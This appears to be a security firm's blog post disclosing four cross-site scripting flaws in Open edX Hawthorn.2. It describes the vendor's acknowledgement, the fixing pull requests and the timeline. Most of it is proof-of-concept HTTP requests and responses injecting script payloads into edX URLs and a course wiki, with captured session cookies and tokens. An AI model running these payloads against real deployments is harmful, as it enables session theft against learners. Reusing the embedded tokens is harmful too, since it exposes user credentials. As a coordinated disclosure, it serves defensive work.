ITAS SECURITY TEAM FOUND MULTI VULNERABILITIES ON OPEN EDX LEARNING PLATFORM

Itas Security Team has found several security gaps on Open EDX. Open EDX is an online education system developed by Harvard and MIT in 2012. It is used by many international organizations, including Microsoft, IBM, Harvard University, Stanford University, and other organizations. During our security testing for clients using the Open EDX system, ITAS Security Team has discovered a number of security vulnerabilities within the Open EDX source code (Hawthorn.2 released 06/29/2018). The vulnerabilities include Stored Cross Site Scripting and Reflected Cross Site Scripting. Hackers could take advantage of these vulnerabilities to attack users of Open EDX.

Itas Security Team sent these vulnerabilities to vendor team to fix. Open EDX team reply email to our team with the following information:

“After the ITAS team notified EdX of the vulnerabilities, EdX examined the claim and acknowledged a total of 4 CAT-1 security issues. ITAS continued to aid in the repair process by pointing out remaining vulnerabilities a second time. To express their appreciation, EdX has offered the ITAS team $600 USD worth of rewards. From EdX’s response to ITAS: “Thank you so much for your hard work to make edx.org more secure for its millions of learners worldwide. As a non-profit opensource company we really appreciate you taking the time to find and disclose these issues to us directly.”

Cross Site Scripting, also known as XSS, is 7th in the top 10 2017 vulnerabilities according to OWASP. As a result of the XSS vulnerability, hackers could steal session of legitimate users to login application or interact with users’ browsers for further attack.

From our observation, we have found that all online education systems using the faulty version are vulnerable to attacks and exploitation, examples of which are listed below.

  • https://courses.edx.org
  • https://openedx.microsoft.com
  • https://openedx.gse.harvard.edu
  • https://lagunita.stanford.edu
  • https://lms.mitx.mit.edu
  • https://university.redislab.com
  • https://openedx.open.ac.uk/
  • https://campus.gov.ilhttps://demo.edunext.io/

1. Application Information

Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27

2. Vulnerabilities Information

a. Template – URL Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://openedx.microsoft.com/template
Affected URL : https://openedx.microsoft.com/template/{PAYLOAD}
Payload: <script>alert(“XSS”)</script>
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /template/<script>alert(‘XSS’)</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close

Missing template <script>alert(‘XSS’)</script>

Video

 

b. Xblock – Reflected Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://openedx.microsoft.com/template
Affected URL : https://openedx.microsoft.com/template/{PAYLOAD}
Payload: <script>alert(“XSS”)</script>
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert(“XSS”)</script>
HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close

Rendering of the xblock view ‘<script>alert(‘XSS’)</script>’ is not supported.

Video

 

c. Certificate – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross-site Scripting
Affected URL: http://localhost/certificates/search/?user={PAYLOAD}
Sample attack pattern: <script>alert(‘XSS’)<script>
Parameter name: user
Parameter Type: GET
Github link: https://github.com/edx/edx-platform/blob/master/lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates(request), line 91
Condition to attack: Required staff role or higher
Fixed link: https://github.com/edx/edx-platform/pull/19519

Proof of concept

Request

GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid=”1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec”; edx-user-info=”{\”username\”: \”staff\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”09d498ab1dd69884525f4cdfa9cca6a6\”\054 \”header_urls\”: {\”learner_profile\”: \”http://192.168.1.238/u/staff\”\054 \”resume_block\”: \”http://192.168.1.238/dashboard\”\054 \”logout\”: \”http://192.168.1.238/logout\”\054 \”account_settings\”: \”http://192.168.1.238/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/

user ‘<script>alert(‘XSS’)</script>’ does not exist

Video

 

d. Wiki – Stored Cross Site Scripting

Vulnerability name: Stored Cross-site Scripting
Affected URL : https://courses.edx.org/courses/{Course_id}/course_wiki
Sample attack pattern : <script>alert(‘XSS’)<script>
Parameter name : content
Parameter Type : POST
Step to reproduce : Login as student user and following the step below

Step 1: Access course wiki by adding course_wiki at the end of course URL (No matter that the course has a wiki or not. E.g: https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki)

Step 2: Click Edit button and put XSS payload(<script>alert(‘XSS’)</script>) into wiki content then save it.

Step 3: Payload popup on https://courses.edx.org/wiki/{Course-id}/ (E.g: https://courses.edx.org/wiki/course-v1:AdelaideX+ProgramX+3T2018/)

Proof of concept

Request 1

GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 302 Found
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Resquest 2

POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=—————————112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1

—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”csrfmiddlewaretoken”

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”title”

Programming for Data Science
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”content”

This is the wiki for **AdelaideX**’s _Programming for Data Science_.
<script>alert(‘XSS’)</script>
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”summary”

—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”current_revision”

89992
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”save”

1
—————————–112257516914770264881620708143–

Response 2

HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY”; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 3

GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid=”1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI”; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDUyNjgyNCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0NTMwNDI0LCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1

Response 3

HTTP/1.1 200 OK
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close

……….SNIPPET……….
<div class=”wiki-article”>
<p>This is the wiki for <strong>AdelaideX</strong>’s <em>Programming for Data Science</em>.
<script>alert(‘XSS’)</script></p>
</div>
……….SNIPPET……….

 

Video

Security Disclaimer
The author is not responsible for any misuse of the information contained here in and accepts no responsibility for any damage caused by the use or misuse of this instructions. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

Information Disclosure
+ 26/11/2018:  find security vulnerabilities
+ 26/12/2018:  send vulnerabilities to software vendor
+ 18/4/2019  :  public information

/ Blog / Tags: , ,